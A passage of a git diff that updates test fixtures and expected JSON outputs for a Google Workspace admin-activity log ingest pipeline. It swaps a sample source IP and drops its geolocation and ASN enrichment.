"foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091484500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916156900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "REMOVE_SECONDARY_DOMAIN", "id": "1", @@ -6402,7 +4998,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6426,35 +5022,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091487500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916161200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "SKIP_SECONDARY_DOMAIN_MX", "id": "1", @@ -6484,7 +5062,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6508,35 +5086,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091512200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916165800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "VERIFY_SECONDARY_DOMAIN_MX", "id": "1", @@ -6566,7 +5126,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6590,35 +5150,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091516200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916171700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "VERIFY_SECONDARY_DOMAIN", "id": "1", @@ -6648,7 +5190,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6672,35 +5214,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091519400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916176300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_DOMAIN_SECONDARY_EMAIL", "id": "1", @@ -6730,7 +5254,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6754,35 +5278,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091521900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916180500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CHANGE_SSO_SETTINGS", "id": "1", @@ -6813,7 +5319,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6832,35 +5338,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091524400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}", + "ingested": "2021-12-09T13:38:31.916184800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}", "provider": "admin", "action": "GENERATE_PIN", "id": "1", @@ -6890,7 +5378,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6914,35 +5402,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091526800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916189400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "UPDATE_RULE", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log index dc0842dc0d4..674f4773472 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log @@ -1,9 +1,9 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"DROP_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_LOG_SEARCH","parameters":[{"name":"EMAIL_LOG_SEARCH_END_DATE","value":"2020/07/28 04:59:59 UTC"},{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"EMAIL_LOG_SEARCH_RECIPIENT","value":"recipient"},{"name":"EMAIL_LOG_SEARCH_SENDER","value":"sender"},{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_SMTP_SENDER_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_START_DATE","value":"2002-10-02T10:00:00Z"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_UNDELETE","parameters":[{"name":"END_DATE","value":"2002-10-02T12:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"START_DATE","value":"2002-10-02T10:00:00Z"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_EMAIL_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CREATE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"DELETE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"REJECT_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"RELEASE_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"DROP_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_LOG_SEARCH","parameters":[{"name":"EMAIL_LOG_SEARCH_END_DATE","value":"2020/07/28 04:59:59 UTC"},{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"EMAIL_LOG_SEARCH_RECIPIENT","value":"recipient"},{"name":"EMAIL_LOG_SEARCH_SENDER","value":"sender"},{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_SMTP_SENDER_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_START_DATE","value":"2002-10-02T10:00:00Z"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_UNDELETE","parameters":[{"name":"END_DATE","value":"2002-10-02T12:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"START_DATE","value":"2002-10-02T10:00:00Z"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_EMAIL_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CREATE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"DELETE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"REJECT_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"RELEASE_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json index baf5083268a..338470c38ea 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -36,35 +36,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770431600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", + "ingested": "2021-12-09T13:38:42.563962500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "DROP_FROM_QUARANTINE", "id": "1", @@ -94,7 +76,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -120,35 +102,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770438600Z", - "original": 